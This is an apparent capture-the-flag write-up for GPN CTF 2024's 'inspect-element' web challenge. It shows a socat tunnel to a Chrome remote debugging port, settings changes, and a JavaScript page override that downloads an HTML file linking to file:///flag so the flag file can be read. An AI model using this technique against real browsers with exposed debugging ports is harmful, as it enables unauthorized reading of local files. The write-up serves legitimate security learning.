GPN CTF 2024 - inspect-element - web
Dockerfile is running chrome with the debugging port open. In order to connect to the debugging port, I had to use the command from hint:
socat TCP-LISTEN:1336,fork OPENSSL:positions--ariana-grande-8298.ctf.kitctf.de:443
Then I could go to chrome://inspect/#devices and connect to the remote debugging port using localhost:1336 as the address. In order to properly connect to this, I following chrome documentation regarding accessing local servers and chrome instances with port forwarding. If succesful, you should see something like this:
Then you can click inspect fallback button and it should open developer tools for the remote chrome instance. Go to chrome://settings/downloads and disable option Ask where to save each file before downloading. The next step is to save the 127.0.0.1:13370 url for overrides, and then make the contents of index.html be the following in your local machine:
<html>
<body>
<button id="download">click</button>
<script defer>
const downloadText = () => {
const text = `<a href="file:///flag">pwn</a>`;
const blob = new Blob([text], { type: "text/plain" });
const url = URL.createObjectURL(blob);
const a = document.createElement("a");
a.href = url;
a.download = "hello.html";
a.click();
URL.revokeObjectURL(url);
};
download.addEventListener("click", downloadText);
</script>
</body>
</html>
After doing so, reload the page, click the button and go to chrome://downloads to see the downloaded file. Open it and the debugger should say that the tab is not active like so:
However, the tab with inspect devices will show that a new tab has opened:
After clicking inspect fallback we are able to click pwn button:
and that will redirect us to the flag file:
P.S.: Going to url file:///flag replaced for some reason the file:/// to http://file///flag so that’s why we used this workaround.